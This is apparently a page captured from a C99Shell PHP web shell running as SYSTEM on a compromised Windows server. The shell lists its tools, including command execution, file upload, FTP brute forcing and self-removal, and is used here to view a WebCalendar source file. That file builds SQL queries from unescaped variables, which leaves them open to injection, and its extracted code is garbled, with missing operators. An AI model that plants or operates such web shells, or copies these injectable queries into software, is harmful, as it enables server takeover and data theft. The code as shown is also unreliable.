!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\WebCalendar-1.0.2\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     views_edit_handler.php (2.24 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once 'includes/init.php';

$error "";

$viewisglobal getPostValue "is_global" );
if ( ! 
$is_admin || $viewisglobal != 'Y' )
  
$viewisglobal 'N'// only admin can create global view
//echo "viewisglobal = $viewisglobal"; exit;

if ( $action == "Delete" || $action == translate ("Delete") ) {
  
// delete this view
  
dbi_query "DELETE FROM webcal_view WHERE cal_view_id = $id " .
    
"AND cal_owner = '$login'" );
} else {
  if ( empty ( 
$viewname ) ) {
    
$error translate("You must specify a view name");
  }
  else if ( ! empty ( 
$id ) ) {
    
# update
    
if ( ! dbi_query "UPDATE webcal_view SET cal_name = " .
      
"'$viewname', cal_view_type = '$viewtype', " .
      
"cal_is_global = '$viewisglobal' " .
      
"WHERE cal_view_id = $id AND cal_owner = '$login'" ) ) {
      
$error translate ("Database error") . ": " dbi_error();
    }
  } else {
    
# new... get new id first
    
$res dbi_query "SELECT MAX(cal_view_id) FROM webcal_view" );
    if ( 
$res ) {
      
$row dbi_fetch_row $res );
      
$id $row[0];
      
$id++;
      
dbi_free_result $res );
      
$sql "INSERT INTO webcal_view " .
        
"( cal_view_id, cal_owner, cal_name, cal_view_type, cal_is_global ) " .
        
" VALUES ( $id, '$login', '$viewname', '$viewtype', '$viewisglobal' )";
      if ( ! 
dbi_query $sql ) ) {
        
$error translate ("Database error") . ": " dbi_error();
      }
    } else {
      
$error translate ("Database error") . ": " dbi_error();
    }
  }

  
# update user list
  
if ( $error == "" ) {
    
dbi_query "DELETE FROM webcal_view_user WHERE cal_view_id = $id);
    
// If selected "All", then just put "__all__" in for usernamne.
    
if ( getPostValue "viewuserall" ) == "Y" )
      
$users = array ( "__all__" );
    for ( 
$i 0; ! empty ( $users ) && $i count $users ); $i++ ) {
      
dbi_query "INSERT INTO webcal_view_user ( cal_view_id, cal_login ) " .
        
"VALUES ( $id, '$users[$i]' )" );
    }
  }
}



if ( 
$error == "" ) {
  
do_redirect "views.php" );
}
print_header();
?>

<h2><?php etranslate("Error")?></h2>

<blockquote>
<?php

echo $error;
//if ( $sql != "" )
//  echo "<br /><br /><span style=\"font-weight:bold;\">SQL:</span> $sql";
//
?>
</blockquote>

<?php print_trailer(); ?>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--